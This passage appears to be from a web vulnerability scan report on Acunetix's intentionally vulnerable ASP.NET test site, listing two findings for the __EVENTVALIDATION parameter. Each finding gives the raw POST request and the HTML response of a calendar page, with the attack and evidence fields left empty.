It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1085 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,085 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8325&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAA1YjSr9oIZGRkEAv9fIhvuFxTrM3tSDO2l3mPM0U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKt3YFNAuKJ2soFAv6Q%2FOMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq%2FUCAuadq%2FUCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm%2BYFAuadm%2BYFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C%2B6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2Ar9QUOpNH5GPK3%2FZgaMhJdpFQEHG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:54 GMT Content-Length: 12593
Response Body - size: 12,593 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAA1YjSr9oIZGRkEAv9fIhvuFxTrM3tSDO2l3mPM0U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKt3YFNAuKJ2soFAv6Q/OMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq/UCAuadq/UCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm+YFAuadm+YFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C+6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2Ar9QUOpNH5GPK3/ZgaMhJdpFQEHG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:White" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8305&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAAkjgboNoIZGRk5YAKJ8LymmdSGOgGhNvwHYOnOGU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKT4NO8DgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJdZIlQqIlHBNQlVSCiDnHs%2FnggnQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:44 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAAkjgboNoIZGRk5YAKJ8LymmdSGOgGhNvwHYOnOGU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKT4NO8DgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJdZIlQqIlHBNQlVSCiDnHs/nggnQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:White" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
